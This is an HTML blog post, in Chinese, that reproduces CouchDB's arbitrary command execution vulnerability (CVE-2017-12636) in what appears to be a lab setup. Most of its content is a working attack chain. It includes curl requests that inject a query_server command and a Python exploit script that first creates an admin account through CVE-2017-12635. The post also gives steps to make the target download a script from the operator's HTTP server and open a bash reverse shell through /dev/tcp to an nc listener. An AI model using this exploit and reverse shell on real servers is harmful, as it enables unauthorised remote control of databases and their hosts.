<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Couchdb 任意命令执行漏洞（CVE-2017-12636）,">










<meta name="description" content="Couchdb Couchdb 任意命令执行漏洞（CVE-2017-12636）漏洞原理Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市">
<meta name="keywords" content="Couchdb 任意命令执行漏洞（CVE-2017-12636）">
<meta property="og:type" content="article">
<meta property="og:title" content="Couchdb 任意命令执行漏洞（CVE-2017-12636）">
<meta property="og:url" content="http://yoursite.com/2019/07/26/ld (7)/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Couchdb Couchdb 任意命令执行漏洞（CVE-2017-12636）漏洞原理Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/15/mAwouR.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/15/mAwXCD.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/15/mA0ubq.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/15/mA0G24.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/15/mABiLR.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/15/mAB6YT.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/15/mAB2pF.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/15/mABfX9.png">
<meta property="og:updated_time" content="2019-08-15T02:40:50.294Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Couchdb 任意命令执行漏洞（CVE-2017-12636）">
<meta name="twitter:description" content="Couchdb Couchdb 任意命令执行漏洞（CVE-2017-12636）漏洞原理Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/08/15/mAwouR.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/07/26/ld (7)/">





  <title>Couchdb 任意命令执行漏洞（CVE-2017-12636） | Hexo</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/26/ld (7)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Couchdb 任意命令执行漏洞（CVE-2017-12636）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-07-26T09:16:18+08:00">
                2019-07-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<h1 id="Couchdb-Couchdb-任意命令执行漏洞（CVE-2017-12636）"><a href="#Couchdb-Couchdb-任意命令执行漏洞（CVE-2017-12636）" class="headerlink" title="Couchdb Couchdb 任意命令执行漏洞（CVE-2017-12636）"></a>Couchdb Couchdb 任意命令执行漏洞（CVE-2017-12636）</h1><p>漏洞原理<br>Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。<br>&emsp;<br>在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12636是一个任意命令执行漏洞，我们可以通过config api修改couchdb的配置query_server，这个配置项在设计、执行view的时候将被运行。<br>复现漏洞<br>访问<a href="http://your-ip:5984/即可看到Couchdb的欢迎页面" target="_blank" rel="noopener">http://your-ip:5984/即可看到Couchdb的欢迎页面</a><br><a href="https://imgchr.com/i/mAwouR" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/15/mAwouR.png" alt="mAwouR.png"></a><br>&emsp;<br>该漏洞是需要登录用户方可触发，如果不知道目标管理员密码，可以利用CVE-2017-12635先【增加一个管理员用户】。这里上一个已经登录过了<br><a href="https://imgchr.com/i/mAwXCD" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/15/mAwXCD.png" alt="mAwXCD.png"></a><br>新增query_server配置，写入要执行的命令：<br>[root@localhost ~]# curl -X PUT ‘<a href="http://zqd:vulhub@192.168.199.217:5984/_config/query_servers/cmd&#39;" target="_blank" rel="noopener">http://zqd:vulhub@192.168.199.217:5984/_config/query_servers/cmd&#39;</a> -d ‘“id &gt;/tmp/success”‘<br>“id &gt;/tmp/success”<br>&emsp;<br>[root@localhost ~]# curl -X PUT ‘<a href="http://zqd:vulhub@192.168.199.217:5984/zqd&#39;" target="_blank" rel="noopener">http://zqd:vulhub@192.168.199.217:5984/zqd&#39;</a><br>{“error”:”file_exists”,”reason”:”The database could not be created, the file already exists.”}<br>新建一个临时库和临时表，插入一条记录<br>[root@localhost ~]# curl -X PUT ‘<a href="http://zqd:vulhub@192.168.199.217:5984/ddd&#39;" target="_blank" rel="noopener">http://zqd:vulhub@192.168.199.217:5984/ddd&#39;</a><br>{“ok”:true}<br>[root@localhost ~]# curl -X PUT ‘<a href="http://zqd:vulhub@192.168.199.217:5984/ddd/vul&#39;" target="_blank" rel="noopener">http://zqd:vulhub@192.168.199.217:5984/ddd/vul&#39;</a> -d ‘{“_id”:”770895a97726d5ca6d70a22173005c7b”}’<br>{“ok”:true,”id”:”vul”,”rev”:”1-967a00dff5e02add41819138abb3284d”}<br>调用query_server处理数据。<br>[root@localhost ~]# curl -X PUT <a href="http://zqd:vulhub@192.168.199.217:5984/ddd/_design/vul" target="_blank" rel="noopener">http://zqd:vulhub@192.168.199.217:5984/ddd/_design/vul</a> -d ‘{“_id”:”_design/test”,”views”:{“wooyun”:{“map”:””} },”language”:”cmd”}’ -H “Content-Type: application/json”<br>{“ok”:true,”id”:”_design/vul”,”rev”:”1-ed713e4db9c7db605913fd62fb102ded”}<br>&emsp;<br>在kali上<br>执行EXP反弹Shell<br>根据上述发送的请求，可使用 python 编写EXP（实验文件exp.py）简化操作，修改EXP中的 target (目标机器地址)和 command （执行的命令），运行脚本即可执行对应的命令。<br>现在我们需要反弹一个可交互的Shell回操作机，本实验的思路是，在操作机中准备好反弹脚本并开启HTTP服务，然后利用EXP让目标 服务器 下载反弹脚本，接着，在操作机使用NC监听本地端口，最后利用EXP在目标服务器中执行反弹脚本，将Shell反弹至操作机监听的端口上，完成反弹Shell操作。<br>反弹Shell的命令，在经过数据库处理时不能直接执行，遂此处分为两步去实现<br>&emsp;<br>准备反弹脚本<br>cd 至 /home/目录下，使用Vim编辑器新建一个index.html文件，写入最终执行的命令，内容如下：<br>bash -i &gt;&amp; /dev/tcp/192.168.199.226/9000 0&gt;&amp;1 这里是本机ip<br><a href="https://imgchr.com/i/mA0ubq" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/15/mA0ubq.png" alt="mA0ubq.png"></a><br>这条命令意思为创建一个可交互的bash和一个到192.168.199.226:9000的TCP链接，然后将bash的输入输出错误都重定向到在191.168.199.226:9000监听的进程中。<br>&emsp;<br>2.另起一个终端，在/home/目录下执行 python -m SimpleHTTPServer 8000 ,开启HTTP服务<br><a href="https://imgchr.com/i/mA0G24" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/15/mA0G24.png" alt="mA0G24.png"></a><br>3.修改 exp.py 中的 command 的值为 curl 192.168.199.226:8000 -o /tmp/bashell ,保存并执行命令 python exp.py<br>&emsp;</p>
<p>#!/usr/bin/env python3<br>import requests<br>from requests.auth import HTTPBasicAuth<br>&emsp;<br>target = ‘<a href="http://192.168.199.217:5984&#39;" target="_blank" rel="noopener">http://192.168.199.217:5984&#39;</a>      （这里是靶机ip）<br>command = ‘“curl 192.168.199.226:8000 -o /tmp/bashell”‘<br>version = 1<br>&emsp;<br>session = requests.session()<br>session.headers = {<br>    ‘Content-Type’: ‘application/json’<br>}</p>
<h1 id="session-proxies"><a href="#session-proxies" class="headerlink" title="session.proxies = {"></a>session.proxies = {</h1><h1 id="‘http’-‘http-127-0-0-1-8085-39"><a href="#‘http’-‘http-127-0-0-1-8085-39" class="headerlink" title="‘http’: ‘http://127.0.0.1:8085&#39;"></a>‘http’: ‘<a href="http://127.0.0.1:8085&#39;" target="_blank" rel="noopener">http://127.0.0.1:8085&#39;</a></h1><h1 id><a href="#" class="headerlink" title="}"></a>}</h1><p>session.put(target + ‘/_users/org.couchdb.user:wooyun’, data=’’’{<br>  “type”: “user”,<br>  “name”: “wooyun”,<br>  “roles”: [“_admin”],<br>  “roles”: [],<br>  “password”: “wooyun”<br>}’’’)<br>&emsp;<br>session.auth = HTTPBasicAuth(‘wooyun’, ‘wooyun’)<br>&emsp;<br>if version == 1:<br>    session.put(target + (‘/_config/query_servers/cmd’), data=command)<br>else:<br>    host = session.get(target + ‘/_membership’).json()[‘all_nodes’][0]<br>    session.put(target + ‘/_node/{}/_config/query_servers/cmd’.format(host), data=command)<br>%emsp;<br>session.put(target + ‘/wooyun’)<br>session.put(target + ‘/wooyun/test’, data=’{“_id”: “wooyuntest”}’)<br>&emsp;<br>if version == 1:<br>    session.post(target + ‘/wooyun/_temp_view?limit=10’, data=’{“language”:”cmd”,”map”:””}’)<br>else:<br>    session.put(target + ‘/wooyun/_design/test’, data=’{“_id”:”_design/test”,”views”:{“wooyun”:{“map”:””} },”language”:”cmd”}’)<br>开启http服务<br><a href="https://imgchr.com/i/mABiLR" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/15/mABiLR.png" alt="mABiLR.png"></a><br>重新开启一台终端监听<br><a href="https://imgchr.com/i/mAB6YT" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/15/mAB6YT.png" alt="mAB6YT.png"></a><br>修改 exp.py 中的 command 的值为 bash /tmp/bashell ,保存并执行命令 python exp.py ,成功获取反弹回来的Shell<br><a href="https://imgchr.com/i/mAB2pF" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/15/mAB2pF.png" alt="mAB2pF.png"></a><br>在反弹回来的Shell中cd 到目录/tmp/下，可以看见运行Poc和Exp时存储的文件<br><a href="https://imgchr.com/i/mABfX9" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/08/15/mABfX9.png" alt="mABfX9.png"></a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Couchdb-任意命令执行漏洞（CVE-2017-12636）/" rel="tag"># Couchdb 任意命令执行漏洞（CVE-2017-12636）</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/26/ld (10)/" rel="next" title="DNS域传送漏洞">
                <i class="fa fa-chevron-left"></i> DNS域传送漏洞
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/26/ld (8)/" rel="prev" title="Discuz 7.x/6.x 全局变量防御绕过导致代码执行">
                Discuz 7.x/6.x 全局变量防御绕过导致代码执行 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">John Doe</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Couchdb-Couchdb-任意命令执行漏洞（CVE-2017-12636）"><span class="nav-number">1.</span> <span class="nav-text">Couchdb Couchdb 任意命令执行漏洞（CVE-2017-12636）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#session-proxies"><span class="nav-number">2.</span> <span class="nav-text">session.proxies = {</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#‘http’-‘http-127-0-0-1-8085-39"><span class="nav-number">3.</span> <span class="nav-text">‘http’: ‘http://127.0.0.1:8085&#39;</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#null"><span class="nav-number">4.</span> <span class="nav-text">}</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
